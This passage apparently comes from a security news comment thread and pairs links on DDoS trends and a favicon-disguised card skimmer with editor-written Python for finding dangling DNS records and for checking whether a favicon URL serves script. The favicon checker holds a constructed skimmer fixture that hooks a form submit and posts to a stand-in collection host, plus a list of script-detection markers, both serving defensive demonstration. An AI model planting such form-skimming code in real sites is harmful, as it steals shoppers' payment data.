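    ("events2016.example.org.", "CNAME", "events2016-prod.azurewebsites.net."),
    ("cdn.example.org.", "CNAME", "example-cdn.azureedge.net."),
    ("mail.example.org.", "MX", "mx.example.org."),
]

# Fake resolver standing in for DNS in the demo: only the CDN host still exists.
STILL_EXISTS = {"example-cdn.azureedge.net"}
def fake_resolves(host):
    return host in STILL_EXISTS

if __name__ == "__main__":
    for owner, target in find_dangling(SAMPLE_ZONE, fake_resolves):
        print(f"dangling: {owner} -> {target}")
```

Run it against a full zone export on a schedule; a record that was fine last month becomes dangling the day a project's cloud resource is torn down, and nothing in the DNS console will tell you.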
Tomi Engdahl says:
DDoS attacks in Q1 2020
https://securelist.com/ddos-attacks-in-q1-2020/96837/
Since the beginning of 2020, due to the COVID-19 pandemic, life has
shifted almost entirely to the Web: people worldwide are now working,
studying, shopping, and having fun online like never before. This is
reflected in the goals of recent DDoS attacks, with the most targeted
resources in Q1 being websites of medical organizations, delivery
services, and gaming and educational platforms.
Tomi Engdahl says:
Credit card skimmer masquerades as favicon
https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/
When it comes to online credit card skimmers, we have already seen a
number of evasion techniques, some fairly simple and others more
elaborate. The goal remains to deceive online shoppers while staying
under the radar from website administrators and security scanners. In
this latest instance, we observed an old server-side trick combined
with the clever use of an icon file to hide a web skimmer. Threat
actors registered a new website purporting to offer thousands of
images and icons for download, but which in reality has a single
purpose: to act as a façade for a credit card skimming operation.
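The defence here is to stop trusting the file extension: a favicon URL that returns something other than image bytes is a skimmer or a loader, whatever its name says. The checker below is an added example by the editor, not code from Malwarebytes. It verifies the magic bytes of the response and, to catch the server-side trick where the icon host hands back script only for some requests, fetches the same URL under several Referer values through an injectable client; the Referer condition in the fake client and both response bodies are constructed assumptions.

```python
# Magic bytes of formats a favicon may legitimately use.
ICO_MAGIC = b"\x00\x00\x01\x00"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GIF_MAGIC = b"GIF8"
JS_MARKERS = (b"function", b"document.", b"window.", b"<script", b"eval(",
              b"XMLHttpRequest", b"addEventListener", b"btoa(")

def sniff_image(body):
    """Return 'ico', 'png' or 'gif' from the leading bytes, else None."""
    if body.startswith(ICO_MAGIC):
        return "ico"
    if body.startswith(PNG_MAGIC):
        return "png"
    if body.startswith(GIF_MAGIC):
        return "gif"
    return None

def check_favicon_response(content_type, body):
    """Classify one response fetched from an icon URL as
    ('ok' | 'suspicious' | 'malicious', detail)."""
    kind = sniff_image(body)
    if kind:
        if content_type and not content_type.lower().startswith("image/"):
            return "suspicious", f"{kind} bytes served as {content_type}"
        return "ok", kind
    hits = [m.decode() for m in JS_MARKERS if m in body[:8192]]
    if hits:
        return "malicious", "icon URL returned script: " + ", ".join(hits)
    return "suspicious", "not a recognised image format"

def differential_check(fetch, url, referers):
    """Fetch the same icon URL under several Referer values (None = no header) and
    classify each. A host that swaps the icon for script only when the request
    comes from a checkout page shows up as differing verdicts."""
    return {ref: check_favicon_response(*fetch(url, ref)) for ref in referers}

# Constructed responses standing in for the real site (no network access needed).
ICO_SAMPLE = ICO_MAGIC + b"\x01\x00" + b"\x10\x10\x00\x00\x01\x00\x20\x00" + b"\x00" * 24
JS_SAMPLE = (b"var f=document.forms[0];f.addEventListener('submit',function(){"
             b"new XMLHttpRequest().open('POST','https://images.example/collect');});")

def fake_fetch(url, referer):
    """Stand-in HTTP client: the fake icon host serves script only to checkout pages."""
    if referer and "checkout" in referer:
        return "image/x-icon", JS_SAMPLE
    return "image/x-icon", ICO_SAMPLE

if __name__ == "__main__":
    results = differential_check(fake_fetch, "https://images.example/favicon.ico",
                                 [None, "https://shop.example/checkout/"])
    for ref, verdict in results.items():
        print(ref, verdict)
```

For a real site, wrap urllib or requests in a `fetch(url, referer)` that sets the Referer header and returns (Content-Type, body), and run the check from outside the shop's own network; a skimmer host that fingerprints the requester will happily serve a genuine icon to a security scanner.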
Tomi Engdahl says:
Now That Everyone’s Working From Home, How’s Your Helpdesk Holding Up?
https://www.securityweek.com/now-everyones-working-home-hows-your-helpdesk-holding
Tomi Engdahl says:
As Healthcare Industry Transforms Overnight, Tech Community Must Act
https://www.securityweek.com/healthcare-industry-transforms-overnight-tech-community-must-act
The Technology Industry Must Come Together to Help Healthcare Meet the Challenges Sparked by the COVID-19 Outbreak